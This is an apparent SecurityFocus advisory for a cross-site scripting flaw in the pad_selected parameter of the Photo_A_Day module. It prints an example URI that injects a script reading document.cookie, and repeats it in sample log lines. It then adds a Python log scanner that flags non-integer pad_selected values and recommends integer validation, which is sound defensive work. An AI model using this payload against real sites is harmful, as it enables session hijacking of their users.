PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability

An exploit is not required. An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script>
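A detection check for the request shape above, as an added example that is not part of the original advisory: it scans web access logs for Photo_A_Day requests whose pad_selected value is not a plain integer. It assumes Apache combined-format logs and that pad_selected is meant to be a numeric photo ID (inferred from the 44 in the example URI); the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2010:10:01:02 +0000] "GET /modules.php?name=Photo_A_Day&action=single&pad_selected=44 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Mar/2010:10:02:10 +0000] "GET /modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 5301
203.0.113.5 - - [12/Mar/2010:10:02:40 +0000] "GET /modules.php?name=Photo_A_Day&pad_selected=44&pad_selected=45%3Cb%3E HTTP/1.1" 200 5120
203.0.113.4 - - [12/Mar/2010:10:03:00 +0000] "GET /modules.php?name=News&pad_selected=abc HTTP/1.1" 200 900
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate pad_selected is a short run of ASCII digits.
NUMERIC_RE = re.compile(r"[0-9]{1,10}")


def suspicious_pad_selected(log_text):
    """Return (client, decoded_value) for every Photo_A_Day request whose
    pad_selected parameter is anything other than a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/modules.php"):
            continue
        # parse_qs URL-decodes values and keeps repeated parameters as a list,
        # so a benign first value cannot hide a hostile second one.
        params = parse_qs(parts.query, keep_blank_values=True)
        if "Photo_A_Day" not in params.get("name", []):
            continue
        for value in params.get("pad_selected", []):
            if not NUMERIC_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_pad_selected(SAMPLE_LOG):
        print(f"{client}\tpad_selected={value!r}")
```

The same integer-only rule is the natural server-side fix: reject or cast pad_selected before it reaches a query or the page output.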


 

Copyright 2010, SecurityFocus